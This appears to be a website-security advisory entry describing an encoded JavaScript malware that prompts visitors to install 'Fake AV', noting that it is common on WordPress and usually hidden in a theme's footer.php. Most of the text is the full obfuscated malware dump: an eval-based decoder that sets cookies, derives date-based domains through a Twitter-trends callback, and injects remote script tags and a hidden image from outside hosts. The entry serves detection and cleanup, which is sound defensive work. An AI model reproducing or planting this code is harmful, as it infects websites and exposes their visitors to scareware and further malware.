Description:Encoded javascript malware that prompts the user to install “Fake AV”
and other virus.
Affecting: Any web site (common on WordPress).
Clean up: This malware is generally stored at the footer.php file of the WordPress
theme.
Malware dump:
<script language="javascript">var asdas="asd8(@+";function z(s){var asdas="asd8(@";r="";for(i=0;i<s.length;i++){var asdas="asd8(@";if(s.charAt(i)=="Z"){var asdas="asd8(@";s1="%"}else{var asdas="asd8(@";s1=s.charAt(i);}r=r+s1;var asdas="asd8(@";}return unescape(r);}var sdkajsnd="e"+""+"v"+"al";function t(){return z($a);}var $a="Z63eZ3dZ22Z2561rZ2543Z256fdZ2565AZ2574(0)Z255e(Z25270x00Z2527+Z2565s))Z2529;Z257d}Z22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cbZ3dZ225(Z2564s)Z253bsZ2574Z253dtmpZ253dZ2527Z2527;foZ2572(Z2569Z253d0;iZ253cds.Z256cZ22;dzZ3dZ22Z2566uZ256ecZ2574ioZ256eZ2520dwZ2528tZ2529Z257bcaZ253dZ2527Z252564Z25256fZ252563Z252575meZ256eZ252574Z252ewZ252572iZ252574eZ2528Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253csZ252563rZ252569pZ2574 Z2525Z2536cZ2561ngZ25257Z2535Z252561geZ25253dZ25255cZ25252Z2532javZ2561Z2573cZ25257Z2532Z25256Z2539pZ252574Z2525Z2535cZ252522Z25253eZ2527;cZ2563Z253dZ2527Z25253cZ25255cZ25252fscriptZ25253Z2565Z2527;Z2577iZ256edZ256fwZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522Z255d(unZ2565sZ2563apeZ2528Z2574))Z257d;Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dZ2573tZ253bdZ2563sZ2528Z2564Z2561Z252bZ2564bZ252bdZ2563Z252bdZ2564+Z2564eZ252c1Z2530Z2529Z253bdZ2577(Z2573tZ2529Z253bsZ2574Z253dZ2524Z2561Z253bZ2522;Z22;czZ3dZ22Z2566uncZ2574ionZ2520cZ257a(czZ2529Z257bretZ2575rnZ2520cZ2561+cZ2562+Z2563c+cZ2564Z252bceZ252bczZ253b};Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;opZ3dZ22Z2524Z2561Z253dZ2522dw(Z2564Z2563s(Z2563u,Z25314))Z253bZ2522;Z22;cdZ3dZ223dst+SZ2574riZ256eg.fZ2572omCZ2568aZ2572Z2543Z256fde(Z2528Z2574mZ2570Z252echZ22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;uuvvww;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22Z2565ngtZ2568;i+Z252b)Z257btmpZ253ddZ2573.slZ2569cZ2565(i,Z2569+1)Z253bstZ25Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;caZ3dZ22Z2566uncZ2574ioZ256e dZ2563sZ2528Z2564s,Z2565sZ2529Z257bdsZ253dunesZ2563apZ256Z22;Z69fZ20(doZ63Z75menZ74.Z63ooZ6bieZ2einZ64Z65xZ4fZ66(Z27rf5f6Z64sZ27)Z3dZ3d-1)Z7bfunctZ69Z6fnZ20Z63Z61Z6cZ6cbacZ6b(xZ29Z7bwindZ6fw.tZ77 Z3d Z78;vZ61rZ20d Z3d neZ77 Z44Z61teZ28)Z3bd.sZ65tTiZ6dZ65(Z78Z5bZ22as_ofZ22]*10Z300)Z3bZ76ar Z68Z20Z3d d.Z67etZ55TZ43Z48ouZ72s()Z3bwinZ64oZ77.Z68 Z3d hZ3bif Z28h Z3e 8Z29Z7bd.Z73etZ55Z54CDaZ74Z65(d.Z67Z65tUZ54CDZ61te(Z29 - Z32);Z7delsZ65Z7bd.Z73etUZ54CDZ61Z74e(Z64.geZ74UZ54CZ44ateZ28) -Z203)Z3b}Z77iZ6eZ64owZ2egZ64 Z3d Z64;Z76ar Z74Z69mZ65 Z3d newZ20AZ72Z72aZ79()Z3bvarZ20shiZ66tInZ64eZ78Z20Z3d Z22Z22;time[Z22yeaZ72Z22] Z3d d.geZ74UTZ43Z46ulZ6cYeaZ72()Z3btiZ6de[Z22moZ6ethZ22Z5dZ20Z3dZ20d.gZ65tZ55TCZ4dontZ68Z28)+1Z3btZ69meZ5bZ22daZ79Z22]Z20Z3d Z64.geZ74UTCZ44ateZ28Z29;ifZ20(dZ2egetZ55TZ43MZ6fnthZ28)+Z31 Z3c 10)Z7bshifZ74InZ64eZ78 Z3d timeZ5bZ22yearZ22] +Z20Z22-0Z22 + (Z64.Z67etUZ54CMoZ6eZ74Z68(Z29+1Z29;}Z65Z6csZ65Z7bsZ68ifZ74IZ6edeZ78 Z3d tZ69Z6dZ65[Z22yearZ22Z5d Z2bZ20Z22-Z22 +Z20(d.Z67eZ74UZ54Z43MZ6fZ6etZ68Z28Z29+1Z29;}Z69fZ20(d.Z67etUZ54Z43DZ61Z74e(Z29 Z3c 10)Z7bshZ69ftIZ6edeZ78 Z3dZ73Z68Z69fZ74IndZ65xZ20+ Z22-0Z22 + dZ2egeZ74UTCZ44aZ74eZ28)Z3b}eZ6cZ73Z65Z7bsZ68iftZ49Z6edZ65x Z3d Z73hiZ66Z74InZ64exZ20+Z20Z22-Z22 + Z64Z2egeZ74UTZ43DaZ74Z65Z28Z29;}Z64Z6fcuZ6dZ65Z6etZ2ewriZ74Z65(Z22Z3csZ63rZ22+Z22iptZ20lanZ67uZ61Z67eZ3djavZ61Z73crZ69pZ74Z22+Z22 Z73rZ63Z3dZ27httZ70:Z2fZ2fsZ65aZ72ch.Z74wZ69ttZ65Z72.Z63oZ6dZ2ftrZ65nZ64sZ2fZ64aZ69lyZ2ejZ73onZ3fdZ61tZ65Z3dZ22+ shiZ66tIZ6eZ64Z65x+Z22&cZ61llZ62acZ6bZ3dcalZ6cbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22Z20+ Z22iptZ3eZ22Z29;} Z66Z75nctZ69oZ6e cZ61lZ6cbaZ63kZ32Z28Z78Z29Z7bwindZ6fw.tZ77Z20Z3d x;Z73cZ28Z27rf5f6dZ73Z27,2,7);Z65Z76alZ28uneZ73capZ65(dZ7aZ2bZ63Z7aZ2bopZ2bsZ74)+Z27dw(dZ7a+czZ28$aZ2bstZ29);Z27);dZ6fcuZ6deZ6et.Z77Z72iZ74e(Z24a);Z7ddoZ63umZ65ntZ2ewZ72Z69teZ28Z22Z3cimg srcZ3dZ27htZ74p:Z2fZ2fsearZ63h.tZ77Z69tteZ72.Z63omZ2fimaZ67esZ2fsearZ63Z68Z2frss.Z70ngZ27 wiZ64thZ3d1 Z68Z65iZ67hZ74Z3d1 stZ79Z6cZ65Z3dZ27visibZ69litZ79Z3aZ68iddZ65nZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61geZ3djavZ61scrZ69Z70tZ22+Z22 srcZ3dZ27httpZ3aZ2fZ2fseaZ72cZ68.Z74witZ74Z65r.Z63oZ6dZ2ftrZ65nZ64sZ2fdaiZ6cyZ2ejsoZ6e?Z63aZ6clbaZ63kZ3dcallbZ61Z63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elZ73Z65Z7b$Z61Z3dZ27Z27};functZ69Z6fn Z73c(Z63nZ6d,vZ2cedZ29Z7bvaZ72Z20Z65xZ64Z3dnew DaZ74eZ28Z29Z3bexdZ2esetZ44aZ74e(eZ78Z64.gZ65tDaZ74Z65(Z29+edZ29;Z64oZ63uZ6dentZ2ecZ6fZ6fkieZ3dcnmZ2b Z27Z3dZ27 +esZ63apZ65(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fGZ4dTZ53trZ69nZ67Z28);Z7d;";window[sdkajsnd](t());</script>
Loading 
